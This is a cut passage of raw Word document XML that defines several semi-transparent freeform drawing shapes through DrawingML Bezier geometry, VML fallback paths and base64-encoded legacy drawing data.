                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="1776629" y="139308"/>
                                <a:pt x="1757861" y="142070"/>
                                <a:pt x="1742063" y="142406"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="1389794" y="149901"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="1337329" y="152399"/>
                                <a:pt x="1284923" y="157396"/>
                                <a:pt x="1232398" y="157396"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="422929" y="149901"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="339034" y="148667"/>
                                <a:pt x="140760" y="139119"/>
                                <a:pt x="48175" y="134911"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="40680" y="132413"/>
                                <a:pt x="30625" y="133585"/>
                                <a:pt x="25690" y="127416"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="10951" y="108993"/>
                                <a:pt x="21524" y="46847"/>
                                <a:pt x="25690" y="37475"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="28899" y="30256"/>
                                <a:pt x="-43015" y="18738"/>
                                <a:pt x="40680"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E9C542" id="Freeform 483" o:spid="_x0000_s1026" style="position:absolute;margin-left:75.25pt;margin-top:159.5pt;width:141.9pt;height:12.4pt;z-index:251773952;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="1802024,15739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&#10;SwUGAAAAAAQABADzAAAA9QkAAAAA&#10;" path="m40680,14990c124375,11242,26881,14990,527860,14990,660297,14990,792686,19987,925099,22485l1119972,14990,1464745,,1607152,7495c1667100,10283,1729085,-612,1787034,14990,1802292,19098,1802024,59960,1802024,59960,1799526,67455,1796243,74733,1794529,82445,1791232,97280,1797041,115979,1787034,127416,1776629,139308,1757861,142070,1742063,142406l1389794,149901c1337329,152399,1284923,157396,1232398,157396l422929,149901c339034,148667,140760,139119,48175,134911,40680,132413,30625,133585,25690,127416,10951,108993,21524,46847,25690,37475,28899,30256,-43015,18738,40680,14990xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="40680,14990;527860,14990;925099,22485;1119972,14990;1464745,0;1607152,7495;1787034,14990;1802024,59960;1794529,82445;1787034,127416;1742063,142406;1389794,149901;1232398,157396;422929,149901;48175,134911;25690,127416;25690,37475;40680,14990" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D5424">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251771904" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F95968A" wp14:editId="1E3AF3CD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>521754</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>564099</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="628362" cy="134911"/>
                <wp:effectExtent l="0" t="0" r="32385" b="17780"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20377"/>
                    <wp:lineTo x="21840" y="20377"/>
                    <wp:lineTo x="21840" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="20" name="Freeform 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="628362" cy="134911"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 2517 w 628362"/>
                            <a:gd name="connsiteY0" fmla="*/ 14990 h 134911"/>
                            <a:gd name="connsiteX1" fmla="*/ 10012 w 628362"/>
                            <a:gd name="connsiteY1" fmla="*/ 82446 h 134911"/>
                            <a:gd name="connsiteX2" fmla="*/ 17507 w 628362"/>
                            <a:gd name="connsiteY2" fmla="*/ 104931 h 134911"/>
                            <a:gd name="connsiteX3" fmla="*/ 39992 w 628362"/>
                            <a:gd name="connsiteY3" fmla="*/ 119921 h 134911"/>
                            <a:gd name="connsiteX4" fmla="*/ 92458 w 628362"/>
                            <a:gd name="connsiteY4" fmla="*/ 134911 h 134911"/>
                            <a:gd name="connsiteX5" fmla="*/ 579638 w 628362"/>
                            <a:gd name="connsiteY5" fmla="*/ 127416 h 134911"/>
                            <a:gd name="connsiteX6" fmla="*/ 624608 w 628362"/>
                            <a:gd name="connsiteY6" fmla="*/ 119921 h 134911"/>
                            <a:gd name="connsiteX7" fmla="*/ 617113 w 628362"/>
                            <a:gd name="connsiteY7" fmla="*/ 44970 h 134911"/>
                            <a:gd name="connsiteX8" fmla="*/ 609618 w 628362"/>
                            <a:gd name="connsiteY8" fmla="*/ 22485 h 134911"/>
                            <a:gd name="connsiteX9" fmla="*/ 587133 w 628362"/>
                            <a:gd name="connsiteY9" fmla="*/ 14990 h 134911"/>
                            <a:gd name="connsiteX10" fmla="*/ 459717 w 628362"/>
                            <a:gd name="connsiteY10" fmla="*/ 0 h 134911"/>
                            <a:gd name="connsiteX11" fmla="*/ 144923 w 628362"/>
                            <a:gd name="connsiteY11" fmla="*/ 7495 h 134911"/>
                            <a:gd name="connsiteX12" fmla="*/ 54982 w 628362"/>
                            <a:gd name="connsiteY12" fmla="*/ 14990 h 134911"/>
                            <a:gd name="connsiteX13" fmla="*/ 2517 w 628362"/>
                            <a:gd name="connsiteY13" fmla="*/ 14990 h 1349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28362" h="134911">
                              <a:moveTo>
                                <a:pt x="2517" y="14990"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="-4978" y="26233"/>
                                <a:pt x="6293" y="60130"/>
                                <a:pt x="10012" y="82446"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="11311" y="90239"/>
                                <a:pt x="12572" y="98762"/>
                                <a:pt x="17507" y="104931"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="23134" y="111965"/>
                                <a:pt x="31935" y="115893"/>
                                <a:pt x="39992" y="119921"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="50745" y="125298"/>
                                <a:pt x="82852" y="132509"/>
                                <a:pt x="92458" y="134911"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="579638" y="127416"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="594829" y="126988"/>
                                <a:pt x="618320" y="133756"/>
                                <a:pt x="624608" y="119921"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="634998" y="97063"/>
                                <a:pt x="620931" y="69786"/>
                                <a:pt x="617113" y="44970"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="615912" y="37161"/>
                                <a:pt x="615204" y="28071"/>
                                <a:pt x="609618" y="22485"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="604032" y="16899"/>
                                <a:pt x="594729" y="17160"/>
                                <a:pt x="587133" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="536085" y="405"/>
                                <a:pt x="534113" y="5723"/>
                                <a:pt x="459717" y="0"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="144923" y="7495"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="114859" y="8608"/>
                                <a:pt x="84802" y="11014"/>
                                <a:pt x="54982" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="47151" y="16034"/>
                                <a:pt x="10012" y="3747"/>
                                <a:pt x="2517"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9BF234" id="Freeform 480" o:spid="_x0000_s1026" style="position:absolute;margin-left:41.1pt;margin-top:44.4pt;width:49.5pt;height:10.6pt;z-index:251771904;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="628362,13491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&#10;AAAABAAEAPMAAABGCQAAAAA=&#10;" path="m2517,14990c-4978,26233,6293,60130,10012,82446,11311,90239,12572,98762,17507,104931,23134,111965,31935,115893,39992,119921,50745,125298,82852,132509,92458,134911l579638,127416c594829,126988,618320,133756,624608,119921,634998,97063,620931,69786,617113,44970,615912,37161,615204,28071,609618,22485,604032,16899,594729,17160,587133,14990,536085,405,534113,5723,459717,0l144923,7495c114859,8608,84802,11014,54982,14990,47151,16034,10012,3747,2517,14990xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2517,14990;10012,82446;17507,104931;39992,119921;92458,134911;579638,127416;624608,119921;617113,44970;609618,22485;587133,14990;459717,0;144923,7495;54982,14990;2517,14990" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001D5424">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251770880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02B8D293" wp14:editId="5FE9088F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3215379</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>624059</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="749134" cy="209863"/>
                <wp:effectExtent l="0" t="0" r="38735" b="19050"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20945"/>
                    <wp:lineTo x="21985" y="20945"/>
                    <wp:lineTo x="21985" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="22" name="Freeform 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="749134" cy="209863"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 7121 w 749134"/>
                            <a:gd name="connsiteY0" fmla="*/ 22486 h 209863"/>
                            <a:gd name="connsiteX1" fmla="*/ 14616 w 749134"/>
                            <a:gd name="connsiteY1" fmla="*/ 74951 h 209863"/>
                            <a:gd name="connsiteX2" fmla="*/ 22111 w 749134"/>
                            <a:gd name="connsiteY2" fmla="*/ 134912 h 209863"/>
                            <a:gd name="connsiteX3" fmla="*/ 37101 w 749134"/>
                            <a:gd name="connsiteY3" fmla="*/ 179882 h 209863"/>
                            <a:gd name="connsiteX4" fmla="*/ 179508 w 749134"/>
                            <a:gd name="connsiteY4" fmla="*/ 202367 h 209863"/>
                            <a:gd name="connsiteX5" fmla="*/ 486806 w 749134"/>
                            <a:gd name="connsiteY5" fmla="*/ 209863 h 209863"/>
                            <a:gd name="connsiteX6" fmla="*/ 711659 w 749134"/>
                            <a:gd name="connsiteY6" fmla="*/ 194872 h 209863"/>
                            <a:gd name="connsiteX7" fmla="*/ 749134 w 749134"/>
                            <a:gd name="connsiteY7" fmla="*/ 187377 h 209863"/>
                            <a:gd name="connsiteX8" fmla="*/ 741639 w 749134"/>
                            <a:gd name="connsiteY8" fmla="*/ 164892 h 209863"/>
                            <a:gd name="connsiteX9" fmla="*/ 726649 w 749134"/>
                            <a:gd name="connsiteY9" fmla="*/ 44971 h 209863"/>
                            <a:gd name="connsiteX10" fmla="*/ 704164 w 749134"/>
                            <a:gd name="connsiteY10" fmla="*/ 7495 h 209863"/>
                            <a:gd name="connsiteX11" fmla="*/ 644203 w 749134"/>
                            <a:gd name="connsiteY11" fmla="*/ 0 h 209863"/>
                            <a:gd name="connsiteX12" fmla="*/ 291934 w 749134"/>
                            <a:gd name="connsiteY12" fmla="*/ 7495 h 209863"/>
                            <a:gd name="connsiteX13" fmla="*/ 127042 w 749134"/>
                            <a:gd name="connsiteY13" fmla="*/ 14990 h 209863"/>
                            <a:gd name="connsiteX14" fmla="*/ 7121 w 749134"/>
                            <a:gd name="connsiteY14" fmla="*/ 22486 h 2098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749134" h="209863">
                              <a:moveTo>
                                <a:pt x="7121" y="22486"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="-11617" y="32480"/>
                                <a:pt x="12281" y="57440"/>
                                <a:pt x="14616" y="74951"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="17278" y="94917"/>
                                <a:pt x="17891" y="115217"/>
                                <a:pt x="22111" y="134912"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="25422" y="150362"/>
                                <a:pt x="22111" y="174885"/>
                                <a:pt x="37101" y="179882"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="105584" y="202709"/>
                                <a:pt x="81554" y="198739"/>
                                <a:pt x="179508" y="202367"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="281901" y="206160"/>
                                <a:pt x="384373" y="207364"/>
                                <a:pt x="486806" y="209863"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="562361" y="206085"/>
                                <a:pt x="636824" y="204850"/>
                                <a:pt x="711659" y="194872"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="724286" y="193188"/>
                                <a:pt x="736642" y="189875"/>
                                <a:pt x="749134" y="187377"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="746636" y="179882"/>
                                <a:pt x="742683" y="172723"/>
                                <a:pt x="741639" y="164892"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="729294" y="72305"/>
                                <a:pt x="742808" y="101528"/>
                                <a:pt x="726649" y="44971"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="723472" y="33852"/>
                                <a:pt x="718879" y="11910"/>
                                <a:pt x="704164" y="7495"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="684871" y="1707"/>
                                <a:pt x="664190" y="2498"/>
                                <a:pt x="644203" y="0"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="291934" y="7495"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="236936" y="9089"/>
                                <a:pt x="181949" y="11447"/>
                                <a:pt x="127042" y="14990"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="-23353" y="24693"/>
                                <a:pt x="25859" y="12492"/>
                                <a:pt x="7121" y="22486"/>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E115A7" id="Freeform 470" o:spid="_x0000_s1026" style="position:absolute;margin-left:253.2pt;margin-top:49.15pt;width:59pt;height:16.5pt;z-index:251770880;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="749134,20986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HspyoGAADJFQAADgAAAGRycy9lMm9Eb2MueG1srFhdj5w2FH2v1P+AeKyUDDYGm1Fmo22qrSpF&#10;SdSkSvvoZcwOEmAK3p3d/PpeXwNjZjdlqLoPszbm+Ph++nLfvH2sq+BBdX2pm11IXkdhoJpc78vm&#10;bhf+8eXmlQiD3shmLyvdqF34pPrw7dWPP7w5tltF9UFXe9UFsEnTb4/tLjwY0243mz4/qFr2r3Wr&#10;GlgsdFdLA9PubrPv5BF2r6sNjaJ0c9Tdvu10rvoenv7iFsMr3L8oVG4+FkWvTFDtQjibwd8Of2/t&#10;7+bqjdzedbI9lPlwDPkfTlHLsgHSaatfpJHBfVc+26ou8073ujCvc11vdFGUuUIZQBoSnUnz+SBb&#10;hbKAcvp2UlP//22bf3j41AXlfhcyDvppZA1GuumUsioP7DPQ0LHtt/Di5/ZTN8x6GFpxH4uutv9B&#10;kOARtfo0aVU9miCHh5xlJGZhkMMSjTKRxnbPzQmc3/fmV6VxI/nwvjfOKHsYoUr3w7Fy3TR9adSf&#10;cNCirsBOP20CTigJjsFAMiDPAH/5AEqZSINDcDoKWO0ZBfEoCEtJusjhI+A0CVnkoB4HpYQsy+Ej&#10;QKcZoYsksUcScxItk/gIwjMhlknAupNBAJJEYlFdPoRGNE75oiiJxwI2FNGyUXyIM/giS+qxcELS&#10;JFuUxYeQjAm+rDHus2CALLL4ECJ4zJc1Bsl3sgtnJI2XZfEhJGUiW5Yl81lomrJlFh/CWMaXg4X4&#10;McwjEIYtamyOgZhcND7xozhljEbxMouPi